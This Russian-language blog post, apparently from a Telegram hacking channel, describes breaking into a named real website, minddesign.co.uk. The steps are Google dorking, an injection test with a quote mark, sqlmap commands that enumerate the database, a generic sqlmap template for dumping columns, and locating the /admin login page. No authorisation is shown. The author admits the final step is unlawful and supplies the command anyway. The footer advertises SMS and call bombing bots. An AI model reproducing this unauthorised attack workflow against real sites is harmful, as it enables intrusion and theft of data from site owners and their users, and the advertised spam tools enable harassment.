Взлом сайта

Взлом сайта

X@ker

Тестирование на проникновение (Пентест) занятие забавное и любопытное. К сожалению или счастью, для пентестера не каждый раз заканчивающееся с положительным результатом. В данной статье будет показан примерный алгоритм действий, который использую и я лично - но стоит понимать, что уникального метода не существует и чаще всего, придется проводить тщательную разведку как с открытых источников (OSINT), так и сканированием своей цели и не редко вступлению с ней в контакт с использованием социальной инженерии. Данный пример - показатель того, насколько может быть уязвим сайт без малейшей защиты, что взломать его можно будет в течении 20 минут (примерно столько у меня ушло со скринами и подготовкой к написанию).

Первым делом я определился с целью, им стал почему-то вот этот аскетичный и сразу же симпатичный сайт прямиком из самых Европ. Попробовав несколько вариантов дорок, наиболее оптимальным оказалась эта дорка

site:minddesign.co.uk inurl:show.php?id=

Дорки или Google Dorks или Гугло Хакинг - специальные запросы в поисковике гугл, результатом которых происходит выдача информации касаемо целевого ресурса. Одними лишь запросами в Google можно выяснить данные от админки, получить доступ к Базе Данных, скачать материалы не предназначенные для общественных глаз и т.д. Действуют конечно данные запросы далеко не для каждого сайта. И так, перейдя по ссылке я попал сюда.

http://www.minddesign.co.uk/show.php?id=9.

Введя контрольную заковырку для проверки теории, что данный сайт имеет уязвимость к SQL инъекции, чтоб стало так

http://www.minddesign.co.uk/show.php?id=9'

И узрел такую картину

Да, тут она с огромнейщей вероятностью присутствует. В этом случае направляемся к SQLmap. Задаем в нем

sqlmap -u http://www.minddesign.co.uk/show.php?id=9 --dbs

И ловим такой результат

Помимо того, что наш сайт открыт сразу для нескольких видов SQL инъекций, еще также можно провести XSS атаку.

Это продолжение того, что не уместилось в снимок. UNION также благоволит к инъекции.

Ну и смотрим в самом низу непосредственно наша БД с именами таблиц information schema и jacobs mddata.

Первый вариант мне кажется интереснее. Ок, вводим данную команду, чтоб увидеть в ней колонки

-u http://www.minddesign.co.uk/show.php?id=9 -D information_schema --tables

И перед нами предстает такая картина


И остается последняя команда, но показывать ее вам я не буду, т.к. данное действие при выполнении будет противоправным))) но подскажу, что ввести вам нужно это:

sqlmap -u http://xxx.zet -D name_db -T name_table -C имя_колонки,имя_колонки --dump

Поздравляю, вы сдампили, т.е. просто скачали себе колонку из БД. Но куда их вводить?! Я просто наугад в конце сайта добавил /admin, чтоб получилось так

www.minddesign.co.uk/admin

И меня встретила страница авторизации

Если кто-то из читателей не представлял как осуществляется взлом веб-ресурсов, теперь может иметь примерное представление =)

Изучай, практикуй, развивайся!

Линк на канал: t.me/XakerInfo
Боты в тг, спаммер смс и звонков. Писать: @GorDX1
Наши боты: @SmsBomberTelegram_bot, @itbook_bot
ДАННАЯ СТАТЬЯ НАПИСАНА ИСКЛЮЧИТЕЛЬНО ДЛЯ ОЗНАКОМЛЕНИЯ, И НИ К ЧЕМУ НЕ ПРИЗЫВАЕТ!

Report Page